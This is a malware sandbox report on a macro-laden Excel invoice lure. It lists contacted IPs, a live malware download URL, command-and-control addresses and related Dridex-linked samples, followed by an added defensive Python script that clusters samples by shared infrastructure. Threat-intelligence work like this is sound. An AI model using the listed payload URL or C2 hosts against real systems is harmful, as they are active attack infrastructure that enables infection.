https://46.105.131.65/t | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
https://5.100.228.233:3389/YB | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
https://5.100.228.233/ | 0% | Avira URL Cloud | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
http://truxiellogroup.com/d0l359.rar | 100% | Avira URL Cloud | malware

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cdn.digicertcdn.com | 104.18.10.39 | true | false |  | unknown
truxiellogroup.com | 68.65.122.35 | true | false |  | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://truxiellogroup.com/d0l359.rar | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp | false |  | high
http://investor.msn.com | DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp | false |  | high
http://www.msnbc.com/news/ticker.txt | DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp | false |  | high
http://crl.entrust.net/server1.crl0 | regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp | false |  | high
http://ocsp.entrust.net03 | regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://80.86.91.27/ | regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp | false | 5%, Virustotal; Avira URL Cloud: safe | unknown
https://77.220.64.37/ | regsvr32.exe, 00000004.00000002.2381998535.00000000006BD000.00000004.00000020.sdmp | true | 7%, Virustotal; Avira URL Cloud: safe | unknown
https://80.86.91.27/P | regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241078237.0000000000236000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://5.100.228.233/qM | regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp | false |  | high
https://80.86.91.27:3308/IB | regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://46.105.131.65:1512/ | regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2385480217.00000000031AA000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp | false |  | high
https://46.105.131.65/f | regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://80.86.91.27:3308/AB | regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000004.00000002.2382362922.00000000021A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2245277258.0000000003D60000.00000002.00000001.sdmp | false |  | high
https://46.105.131.65:1512/yB | regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://investor.msn.com/ | DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp | false |  | high
https://5.100.228.233:3389/aB | regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://46.105.131.65/t | regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.%s.comPA | regsvr32.exe, 00000004.00000002.2382362922.00000000021A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2245277258.0000000003D60000.00000002.00000001.sdmp | false | URL Reputation: safe | low
https://5.100.228.233:3389/YB | regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp | false |  | high
https://5.100.228.233/ | regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.2381929162.0000000001CD0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382046788.00000000008F0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241857829.00000000022E0000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://crl.entrust.net/2048ca.crl0 | regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp | false |  | high

Contacted IPs

                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
5.100.228.233 | unknown | Netherlands | 8315 | SENTIANL | true
80.86.91.27 | unknown | Germany | 8972 | GD-EMEA-DC-SXB1DE | true
46.105.131.65 | unknown | France | 16276 | OVHFR | true
68.65.122.35 | unknown | United States | 22612 | NAMECHEAP-NETUS | false
77.220.64.37 | unknown | Italy | 44160 | INTERNETONEInternetServicesProviderIT | true

                      General Information

                      Joe Sandbox Version:31.0.0 Red Diamond
                      Analysis ID:338309
                      Start date:12.01.2021
                      Start time:01:42:56
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 6m 45s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:INV2680371456-20210111889374.xlsm
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:10
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • GSI enabled (VBA)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.expl.evad.winXLSM@9/21@1/5
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 1.6% (good quality ratio 1.4%)
                      • Quality average: 75.1%
                      • Quality standard deviation: 36.8%
                      HCA Information:
                      • Successful, ratio: 71%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .xlsm
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Found warning dialog
                      • Click Ok
                      • Found warning dialog
                      • Click Ok
                      • Found warning dialog
                      • Click Ok
                      • Attach to Office via COM
                      • Close Viewer
                      Warnings:
                      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 205.185.216.42, 205.185.216.10, 13.88.21.125, 52.147.198.201, 104.18.10.39
                      • Excluded domains from analysis (whitelisted): skypedataprdcoleus16.cloudapp.net, watson.microsoft.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, blobcollector.events.data.trafficmanager.net, cacerts.digicert.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus15.cloudapp.net
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.

                      Simulations

                      Behavior and APIs

Time      Type             Description
01:43:48  API Interceptor  1065x Sleep call for process: regsvr32.exe modified
01:44:05  API Interceptor  554x Sleep call for process: DWWIN.EXE modified

                      Joe Sandbox View / Context

                      IPs

Match | Associated Sample Name / URL | Detection
5.100.228.233 | INV8073565781-20210111319595.xlsm | malicious
5.100.228.233 | HkNkyKl3uT.dll | malicious
5.100.228.233 | ceepq536n.zip.dll | malicious
5.100.228.233 | sample20210111-01.xlsm | malicious
5.100.228.233 | INV3867196801-20210111675616.xlsm | malicious
5.100.228.233 | hiytvys.dll | malicious
5.100.228.233 | l7rgi3xyd.dll | malicious
5.100.228.233 | ymuyks.dll | malicious
5.100.228.233 | INV9698791470-20210111920647.xlsm | malicious
5.100.228.233 | hy9x6wzip.dll | malicious
5.100.228.233 | INV7693947099-20210111388211.xlsm | malicious
5.100.228.233 | jufk0vrar.dll | malicious
80.86.91.27 | INV8073565781-20210111319595.xlsm | malicious
80.86.91.27 | HkNkyKl3uT.dll | malicious
80.86.91.27 | ceepq536n.zip.dll | malicious
80.86.91.27 | sample20210111-01.xlsm | malicious
80.86.91.27 | INV3867196801-20210111675616.xlsm | malicious
80.86.91.27 | hiytvys.dll | malicious
80.86.91.27 | l7rgi3xyd.dll | malicious
80.86.91.27 | ymuyks.dll | malicious
80.86.91.27 | INV9698791470-20210111920647.xlsm | malicious
80.86.91.27 | hy9x6wzip.dll | malicious
80.86.91.27 | INV7693947099-20210111388211.xlsm | malicious
80.86.91.27 | jufk0vrar.dll | malicious
46.105.131.65 | INV8073565781-20210111319595.xlsm | malicious
46.105.131.65 | HkNkyKl3uT.dll | malicious
46.105.131.65 | ceepq536n.zip.dll | malicious
46.105.131.65 | sample20210111-01.xlsm | malicious
46.105.131.65 | INV3867196801-20210111675616.xlsm | malicious
46.105.131.65 | hiytvys.dll | malicious
46.105.131.65 | l7rgi3xyd.dll | malicious
46.105.131.65 | ymuyks.dll | malicious
46.105.131.65 | INV9698791470-20210111920647.xlsm | malicious
46.105.131.65 | hy9x6wzip.dll | malicious
46.105.131.65 | INV7693947099-20210111388211.xlsm | malicious
46.105.131.65 | jufk0vrar.dll | malicious
77.220.64.37 | INV8073565781-20210111319595.xlsm | malicious
77.220.64.37 | HkNkyKl3uT.dll | malicious
77.220.64.37 | ceepq536n.zip.dll | malicious
77.220.64.37 | sample20210111-01.xlsm | malicious
77.220.64.37 | INV3867196801-20210111675616.xlsm | malicious
77.220.64.37 | hiytvys.dll | malicious
77.220.64.37 | l7rgi3xyd.dll | malicious
77.220.64.37 | ymuyks.dll | malicious
77.220.64.37 | INV9698791470-20210111920647.xlsm | malicious
77.220.64.37 | hy9x6wzip.dll | malicious
77.220.64.37 | INV7693947099-20210111388211.xlsm | malicious
77.220.64.37 | jufk0vrar.dll | malicious
77.220.64.37 | SecuriteInfo.com.Trojan.Dridex.735.5073.dll | malicious
77.220.64.37 | 1 Total New Invoices-Monday December 14 2020.xls | malicious
77.220.64.37 | 1 Total New Invoices-Monday December 14 2020.xlsm | malicious
77.220.64.37 | 1 Total New Invoices-Monday December 14 2020.xlsm | malicious
77.220.64.37 | 1 Total New Invoices-Monday December 14 2020.xlsm | malicious
77.220.64.37 | 1-Total New Invoices Monday Dec 14 2020.xlsm | malicious
77.220.64.37 | 1 Total New Invoices-Monday December 14 2020.xlsm | malicious
77.220.64.37 | SecuriteInfo.com.Mal.EncPk-APV.3900.dll | malicious
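The same twelve samples (the INV*.xlsm lures and the *.dll payloads) recur under all four IPs above, which is the overlap an analyst pivots on to tie the documents and the second-stage DLLs together; the IPs the sandbox itself whitelisted (the "Excluded IPs from analysis" list in the warnings above) are CDN and telemetry noise and must be dropped before anything is promoted to an IOC. The Python below is an added example, not part of the Joe Sandbox report: it parses rows in exactly the flattened form shown on this page (IP only on the first row of each group, then sample name, "Get hash", detection, "Browse"), drops the report's whitelisted IPs, and groups samples by the set of IPs they share. RAW_IPS_TABLE is a constructed subset of the rows above, with two rows reshaped from the context column of the Domains table further down; the function names are the example's own.

```python
"""Pivot on shared infrastructure in a sandbox "IPs" context table.

Added example; not part of the Joe Sandbox report. The rows in RAW_IPS_TABLE
are a constructed subset of the report's own IPs table, kept in the flattened
form the page shows (the IP appears only on the first row of each group);
the last two rows are reshaped from the Domains table's context column.
WHITELISTED_IPS is the report's "Excluded IPs from analysis" list.
"""
from __future__ import annotations

import re
from collections import defaultdict

# Constructed input (subset of the report's rows, flattened as on the page).
RAW_IPS_TABLE = """\
5.100.228.233INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
HkNkyKl3uT.dllGet hashmaliciousBrowse
sample20210111-01.xlsmGet hashmaliciousBrowse
80.86.91.27INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
HkNkyKl3uT.dllGet hashmaliciousBrowse
sample20210111-01.xlsmGet hashmaliciousBrowse
46.105.131.65INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
HkNkyKl3uT.dllGet hashmaliciousBrowse
sample20210111-01.xlsmGet hashmaliciousBrowse
77.220.64.37INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
HkNkyKl3uT.dllGet hashmaliciousBrowse
sample20210111-01.xlsmGet hashmaliciousBrowse
SecuriteInfo.com.Trojan.Dridex.735.5073.dllGet hashmaliciousBrowse
1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
104.18.10.39sample20210111-01.xlsmGet hashmaliciousBrowse
SurfsharkSetup.exeGet hashmaliciousBrowse
"""

# From the report's warnings: CDN / Microsoft telemetry the sandbox excluded.
WHITELISTED_IPS = frozenset({
    "205.185.216.42", "205.185.216.10", "13.88.21.125",
    "52.147.198.201", "104.18.10.39",
})

# A flattened row is: [optional IPv4] + sample name + "Get hash" + detection + "Browse".
# The optional IP is matched greedily, so a sample name that starts with digits
# directly after an IP would be ambiguous; the report has no such row.
_ROW = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})?(?P<sample>.+?)Get hash(?P<det>\w+)Browse$"
)


def parse_flattened_ip_table(text: str) -> list[tuple[str, str, str]]:
    """Return (ip, sample, detection) rows, carrying the IP forward within a group."""
    rows: list[tuple[str, str, str]] = []
    current_ip: str | None = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = _ROW.match(line)
        if m is None:
            raise ValueError(f"unrecognised row: {line!r}")
        if m.group("ip"):
            current_ip = m.group("ip")
        if current_ip is None:
            raise ValueError("first row of the table carries no IP")
        rows.append((current_ip, m.group("sample"), m.group("det")))
    return rows


def samples_by_indicator(rows, whitelist=WHITELISTED_IPS) -> dict[str, set[str]]:
    """Map each non-whitelisted IP to the set of samples seen contacting it."""
    out: dict[str, set[str]] = defaultdict(set)
    for ip, sample, _det in rows:
        if ip in whitelist:
            continue  # shared CDN/telemetry: never promote to an IOC
        out[ip].add(sample)
    return dict(out)


def footprints(rows, whitelist=WHITELISTED_IPS) -> dict[frozenset[str], list[str]]:
    """Group samples by the exact set of non-whitelisted IPs they contacted.

    Samples with an identical footprint are the strongest pivot: here the
    lure documents and DLL payloads that all touch the same four IPs.
    """
    per_sample: dict[str, set[str]] = defaultdict(set)
    for ip, sample, _det in rows:
        if ip not in whitelist:
            per_sample[sample].add(ip)
    groups: dict[frozenset[str], set[str]] = defaultdict(set)
    for sample, ips in per_sample.items():
        groups[frozenset(ips)].add(sample)
    return {k: sorted(v) for k, v in groups.items()}


def rank_indicators(rows, whitelist=WHITELISTED_IPS) -> list[tuple[str, int]]:
    """IPs ordered by how many distinct samples used them (most shared first)."""
    by_ip = samples_by_indicator(rows, whitelist)
    return sorted(((ip, len(s)) for ip, s in by_ip.items()),
                  key=lambda t: (-t[1], t[0]))


if __name__ == "__main__":
    parsed = parse_flattened_ip_table(RAW_IPS_TABLE)
    for ip, n in rank_indicators(parsed):
        print(f"{ip:<16} {n} samples")
    for ips, samples in footprints(parsed).items():
        print(sorted(ips), "->", samples)
```

Run as a script it prints the IPs ranked by how many samples share them and the footprint groups: the group carrying all four IPs is the set of samples worth treating as one cluster, the two older "Invoices" samples share only 77.220.64.37 with it, and a whitelisted address such as 104.18.10.39 (the CDN behind cdn.digicertcdn.com in the Domains table) never reaches the output even though a sample contacted it.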

                                                                                                                                      Domains

Match | Associated Sample Name / URL | Detection | Context
cdn.digicertcdn.com | sample20210111-01.xlsm | malicious | 104.18.10.39
cdn.digicertcdn.com | INV3867196801-20210111675616.xlsm | malicious | 104.18.11.39
cdn.digicertcdn.com | INV9698791470-20210111920647.xlsm | malicious | 104.18.10.39
cdn.digicertcdn.com | INV7693947099-20210111388211.xlsm | malicious | 104.18.10.39
cdn.digicertcdn.com | SurfsharkSetup.exe | malicious | 104.18.10.39
cdn.digicertcdn.com | https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1 | malicious | 104.18.10.39
cdn.digicertcdn.com | ASHLEY NAIDOO CV.doc | malicious | 104.18.10.39
cdn.digicertcdn.com | RFQ.doc | malicious | 104.18.10.39
cdn.digicertcdn.com | SecuriteInfo.com.Trojan.BtcMine.3311.17146.exe | malicious | 104.18.11.39
cdn.digicertcdn.com | http://test.kunmiskincare.com/index.php | malicious | 104.18.11.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=Q3qQnfemZbaKqqMTD32WX0Q-2F38lqT2tAzE5eVnmPd7-2BQtbqdrAGPxGIiQmtbZbEcQfp88ilOu42BqywW-2BHQ-2F36ib8mcb8EYG4w64Icmefi3xXbpzwMP3NQ3974KeR1Cm-2FtwcR7xFilzHs6N8iNLyS48aGcVYmSpzSB5rZFj7iHuxTwLnTumc1AOR4vtcYHqqiqHY7g-2B-2FJ-2Bp2X-2FMfZ-2FQF6-2BtQvwrHR4Do9NZhu9Dvij-2BKa330W7UbuEz2iIv6oZ18C14g_HT-2FwmlBF7R5nW6HayR9wjpSE-2FEYoNhBRZJxfk0aqS7vYxNZiuzaetMNdYjE6WQ7lhnX-2F3CEUYMAVCWb9b2KoxJgG7bbDpZV8jJzJcz-2FHdj603HdwbUFnR5bNfB4iXdW0ho4xmgP3jr4yW0dQVZ-2FVH-2B4BUSDEwiU9rMA5oZN54vSw8okk6D-2FopaYrwFKHesb3rZ-2B-2FXvvZXiTmiwexXLF98nxPgg28hqPBVP8Ce82XUi0-3D | malicious | 104.18.10.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=eSGWhpVX2YfcJc4oKRJyCitYauf8dzcbVvAmQmQH4oZBbVMlkneKSVGqyJywGhpngTJJbZcqKw2ZrPBb6oQsQjUFyq4tbqbTGCzxR1eG4Z9O9abaPDZxc5NM1HvYjLOzed8zOYLIYcXnFBAxNAMQRlQBs6-2FmRK-2BaDDT2yagiQtTusU0-2FuKBxVVMBtDF3y-2BvaUDK48BxfAjoAvSGh6p8tJcMdNHuC687sMnINVJLdmfU-3D7Y6S_CzF3IAhuvYaPWoKJ87ALtJgaMHByYMlBwvQVuZ3bhcFe4St6cx8KCfN-2B2rcCNvOA-2BeX4QMjQb-2FUgtEcK8j5R6EI1G-2BBWI35h9mDCE7AAF1w3V3wR14L28vyaTqJbw5uQyTI0DJse16q7T2cnyVezsqen7-2F42lXjAhKUL9SqUvgoogoRMVuUrByVc8HvS0sQEQjAPQ8xNbeD4KhQ-2BMcqRFg-3D-3D | malicious | 104.18.11.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=7pk4n7zyu3C81Mn1P-2FDmbQYiftB7Um69feDieyAcP67WG6G79-2FZJVKAlazUBAbfEF4GoDtXgPjNLWzDCnPh7Xakgzgk-2FmStvhSscVXayLFhZIIFZIYIscDWC3Iu-2BcY3A9omatVYEiWPK2Incpc6HzU578AM2hu6p-2Bn6uq0TcLQpocWZwdV9dCrqsMtrX-2FDi4HBg4XX4-2F3i2UkQ7nuJQrSo1-2FKKJZxdiMIvGfSPtt6AA-3D_Ps1_JjL7p1lgTUYZ5WQny2C5NjuXSDa0fPfjvfUw5EqzhcRvTxd-2F1XX8gbl7GK9SIE-2F651Ar7eNStX9JwifbMd-2Bpf6jPpjrN2U1igLfktYyJIQ-2Bml-2FEPkADqSRw-2Fi6D-2BnALXT-2B-2FvcMCA95hRIW-2FohWo93WXHSr3sm64NMmNmn7vCUVlwAUUBcpBMBuo-2FwDzI6vV-2FqVihNDaxiv67q2KreHoN-2B1iBGj-2FxyhjkJJWZIE1Jjos-3D | malicious | 104.18.11.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=67aRGAcCFCvHxiPAckWKkhPC4KvHs6b-2F2weO-2F4bbSuzsR0S00yjD-2Bp98nxI8VUxFO-2BA-2FaoV7I7ejt7iWFdzNGQD7Rt-2B-2FrHigS8odmZ5jtBR1Jc-2F-2ByB20l8hXLQVEUsoKYNzQVntp2VlCibfgJJsmyTb3rVDsu9ejaUs6-2FrCmWTartaVeLsn0D92Hp7N17yWd7UqmLdwaGYREjE6axvHGamR7YgBj26o7dhrUoK-2BeTg4-3DlR5U_V3NU-2FA-2F-2BMCS01eqTEl7SwdC4Y1sHc0Ok-2BE-2BBcFuZa-2FMLGwVAklUo5zpn5w-2FWMCIp5-2FtPYdDyjonZQp2-2Fm-2FtoJqNBof8e11z4gErP9ujPflSfLTzXPNoDO4w6SdWItChamjCgpNcPi7T73NCj5Bg6ZnTadUi7N8-2BY2rrmnE5gpze1qYGwtCTwrD-2FEhq3HOVVSI6EgHrfbUqiGU0pY5jHFIJ3IDNrcPLgrZyFiYcyqRek-3D | malicious | 104.18.11.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=LMh8OQWOikhQ4E8y-2BrYnz-2BbDB2TElaf90yCHoFAn4M1bYurbyYcloHeQnYwY0vQ7VDotXE-2F1AU3v6KKQKAvhhYV0UBWlqtuRNZJVtvX80VxChFCc1lzvSHIOg2vQaiTyT0IDnohwmvAyk6q7Lw7aV2oNzPp1SRnlWHFXN0qSB1ZgfLjV0g7BwyUNgRacGzLQzxxo4OCEX0IynXTekIdGpsnVH8RdeHbQN5hmkvqmAfMoOPsGKIXFuD2XjXmSQNwHQ8tj_OFYFW3aawQjHnZ2oUsm9aGRmiVDxWOGUeXvmswsU9xvx6eL-2F-2Facl5TxDb-2FnQAE-2F9WO-2BX1bZLZ3dQ6WwuATmPzz3S8NpXbPAjepyz5kRHvZa0CDmTSp0IhGs72hXqIXDMOuT72gd5GYA2W6rPcohuTqV3rAs0ui6xQJlDhswQEvrgqzCELYcSf4yeLy0GlPUnnpdaGlBorHCk0eM6B-2FWcFUAXo2t3fTe0C5AFZKARfK8-3D | malicious | 104.18.11.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=pRtNAE4pBw306smbkBG7VfeIwBX2zq-2BxFGkc-2FYVg2kyteQhPgCyjFlF3g7Xm8OdsEJm4m-2Bb8v32fZo5G1S6IScPtZRx0O1qeslKL30HVUgu03CpTlmUlGG19oYXIdBdB3T-2BnneFUo-2FnuydTFtQrV-2FFD7ECFZ6-2BXjQduZf9kDgVI74LqkaeF5jfEKlvI9dNzmUWbncaLWs9jkPrQYRliwgvYISGRxPJ7a3gAUWZPRjDY-3DfCad_fQ8VNONEToroRqvq8M8IT71VVsbp-2FrVCPzMBywYUGjNEx5hFeS-2B3-2B0wfsC8rR2-2FcrAujDEHG74A-2FnVGsRRFxg-2FNYq0Ficj-2F6MNmWD3eD9hLtWuST0s8y4JgrbMq35uIiVx4-2FWXoquNFvepEkXYb-2BIIifvG1Hrrso0Hz938T8Kk2oqOiB-2BWIt73FfY6-2F7kAdcZlD9fseESOxt2IDwNJfsG-2BJ2dV9l2zjNB8qRR8WVLPs-3D | malicious | 104.18.11.39
cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=fuaIpvnsuSQILWwzYiXi5qnEApdA08gndIGt9eDXEUzb2D9ZQis83XJjquyQ-2B9NU6N6PUmNiYKL2-2B9K-2B0Q-2FRuNZV2Rm6EE3tP6uveKZcpGa39fA3R6q6mtnf0YazerOr3Wym2I-2B4EKphohsG9TZrR10vb4sAorg3TlmbMLBvyRhlhPfnKFPOumxhPEnjlTpz4URurYF2wvhUTU5FbrZwbgaLDFhKWhDuDmKVQ4MiqOgEAGo1wQlNp439PzN1eKX8UvDM_oB8tJkdbn8-2B0HmsO8J4iQplzftnfE-2B8k0a9q1EntRKkJu1B-2FCVgO526eX33TRFpJwAzeZS5KAS0tKKzRRvWnodl78aEsHhSxo91ApNyL4MdpCkbZLJkdQb12aN6YOUgsp7GPBut2ZGkQb0VPeuTR9sLawADBZxxcvvOm5C44mioeJoHe0qFQpD7j-2FkTjaJgMi4jWdYXYz6hdODOLE13y3HyL2fGbEXG3mHtm20h7Ry8-3D | malicious | 104.18.10.39
cdn.digicertcdn.com | https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3D | malicious | 104.18.10.39
